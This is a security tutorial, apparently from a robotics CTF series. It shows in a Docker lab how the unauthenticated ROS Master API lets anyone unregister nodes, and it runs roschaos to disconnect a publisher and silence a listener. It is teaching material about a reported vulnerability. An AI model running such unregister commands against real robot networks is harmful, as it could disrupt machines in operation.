tutorial11

\newpage

Unauthenticated registration/unregistration with ROS Master API

In this tutorial we'll review how the ROS Master API requires no authentication capabilities to register and unregister publishers, subscribers and services. This leads to a [reported vulnerability] (aliasrobotics/RVD#87) that can easily be exploited with off-the-shelf penetration testing tools by an attacker with access to the internal robot network.

This work is heavily based on [1],[3] and [4].

---

Note: as in previous tutorials, there's a docker container that facilitates reproducing the work of this tutorial. The container can be built with:

docker build -t basic_cybersecurity11:latest .

and run with:

docker run -it basic_cybersecurity11:latest

---

Let's start by listing the ROS Nodes and Topics participating in the network. After launching the container:

root@d64845e9601e:/# rosrun scenario1 talker &
root@d64845e9601e:/# rosrun scenario1 listener

Now, let's get a second command line into the simulated robotic scenario running over docker. To do so:

| => docker ps
CONTAINER ID        IMAGE                          COMMAND                  CREATED             STATUS              PORTS               NAMES
935c390c1e49        basic_cybersecurity11:latest   "/root/launch_script…"   20 seconds ago      Up 19 seconds                           vibrant_chandrasekhar

| => docker exec -it 935c390c1e49 /bin/bash
root@935c390c1e49:/#

On the second terminal of the same docker instance:

root@d64845e9601e:/# rosnode list
/listener
/publisher
/rosout
root@d64845e9601e:/# rostopic list
/flag
/rosout
/rosout_agg

We can see that there're several Nodes, we're mainly interested on /publisher and /listener. Both, exchanging information through the /flag Topic as follows:

root@d64845e9601e:/# rostopic echo /flag
data: "br{N(*-E6NgwbyWc"
---
data: "br{N(*-E6NgwbyWc"
---
data: "br{N(*-E6NgwbyWc"
---
...

Unregistering /publisher from /listener

root@655447dc534c:/# rosnode list
/listener
/publisher
/rosout
root@655447dc534c:/# roschaos master unregister node --node_name /publisher
Unregistering /publisher

You will see that the listener stops getting messages. If we now verify it:

root@655447dc534c:/# rosnode list
/listener
/rosout

We observe that the ROS Master does not find /publisher anymore, it's been unregistered. Furthermore, the process talker is still running:

root@655447dc534c:/# ps -e
  PID TTY          TIME CMD
    1 pts/0    00:00:00 launch_script.b
   31 pts/0    00:00:00 roscore
   42 ?        00:00:01 rosmaster
   55 ?        00:00:01 rosout
   72 pts/0    00:00:00 bash
   78 pts/1    00:00:00 bash
   90 pts/0    00:00:00 talker
  108 pts/0    00:00:01 listener
  174 pts/1    00:00:00 ps

Resources

• [1] Mendia, G. O., Juan, L. U. S., Bascaran, X. P., Calvo, A. B., Cordero, A. H., Ugarte, I. Z., ... & Vilches, V. M. (2018). Robotics CTF (RCTF), a playground for robot hacking. arXiv preprint arXiv:1810.02690.
• [2] Scenarios of the Robotics CTF (RCTF), a playground to challenge robot security. Retrieved from https://github.com/aliasrobotics/RCTF
• [3] Dieber, B., Breiling, B., Taurer, S., Kacianka, S., Rass, S., & Schartner, P. (2017). Security for the Robot Operating System. Robotics and Autonomous Systems, 98, 192-203.
• [4] SROS2 Tutorial, IROS 2018. Retrieved from https://ruffsl.github.io/IROS2018_SROS2_Tutorial/.
• [5] roschaos. Retrieved from https://github.com/ruffsl/roschaos.
• [6] ROSPenTo. Retrieved from https://github.com/jr-robotics/ROSPenTo.